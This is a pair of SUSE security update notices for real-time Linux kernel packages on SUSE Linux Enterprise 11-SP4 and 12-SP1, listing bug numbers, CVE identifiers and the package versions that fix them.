SUSE-SU-2016:3069-1: An update that solves 11 vulnerabilities and has 49 fixes is now available. Category: security (important) Bug References: 1000189,1001419,1002165,1004418,732582,839104,843236,909994,911687,915183,920016,934760,951392,956514,960689,963655,971975,971989,974620,976867,977687,979514,979595,979681,980371,982218,982783,983535,983619,984102,984194,984992,985206,986362,986365,986445,987565,988440,989152,989261,989779,991608,991665,991923,992566,993127,993890,993891,994296,994436,994618,994759,994926,996329,996664,997708,998399,999584,999600,999932 CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2016-0823,CVE-2016-3841,CVE-2016-4997,CVE-2016-4998,CVE-2016-5195,CVE-2016-5696,CVE-2016-6480,CVE-2016-6828,CVE-2016-7425 Sources used: SUSE Linux Enterprise Real Time Extension 11-SP4 (src): kernel-rt-3.0.101.rt130-65.1, kernel-rt_trace-3.0.101.rt130-65.1, kernel-source-rt-3.0.101.rt130-65.1, kernel-syms-rt-3.0.101.rt130-65.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-rt-3.0.101.rt130-65.1, kernel-rt_debug-3.0.101.rt130-65.1, kernel-rt_trace-3.0.101.rt130-65.1
SUSE-SU-2016:3304-1: An update that solves 13 vulnerabilities and has 118 fixes is now available. Category: security (important) Bug References: 1000189,1000287,1000304,1000776,1001419,1001486,1002165,1003079,1003153,1003400,1003568,1003925,1004252,1004418,1004462,1004517,1004520,1005666,1006691,1007615,1007886,744692,789311,857397,860441,865545,866130,868923,874131,875631,876145,876463,898675,904489,909994,911687,915183,921338,921784,922064,922634,924381,924384,930399,934067,937086,937888,941420,946309,955446,956514,959463,961257,962846,963655,963767,966864,967640,970943,971975,971989,974406,974620,975596,975772,976195,977687,978094,979451,979681,979928,980371,981597,982783,983619,984194,984419,984779,984992,985562,986362,986365,986445,987192,987333,987542,987565,987621,987805,988440,988617,988715,989152,989953,990058,990245,991247,991608,991665,991667,992244,992555,992568,992591,992593,992712,993392,993841,993890,993891,994167,994296,994438,994520,994758,995153,995968,996664,997059,997299,997708,997896,998689,998795,998825,999577,999584,999600,999779,999907,999932 CVE References: CVE-2015-8956,CVE-2016-2069,CVE-2016-4998,CVE-2016-5195,CVE-2016-5696,CVE-2016-6130,CVE-2016-6327,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7425,CVE-2016-8658 Sources used: SUSE Linux Enterprise Real Time Extension 12-SP1 (src): kernel-compute-3.12.67-60.27.1, kernel-compute_debug-3.12.67-60.27.1, kernel-rt-3.12.67-60.27.1, kernel-rt_debug-3.12.67-60.27.1, kernel-source-rt-3.12.67-60.27.1, kernel-syms-rt-3.12.67-60.27.1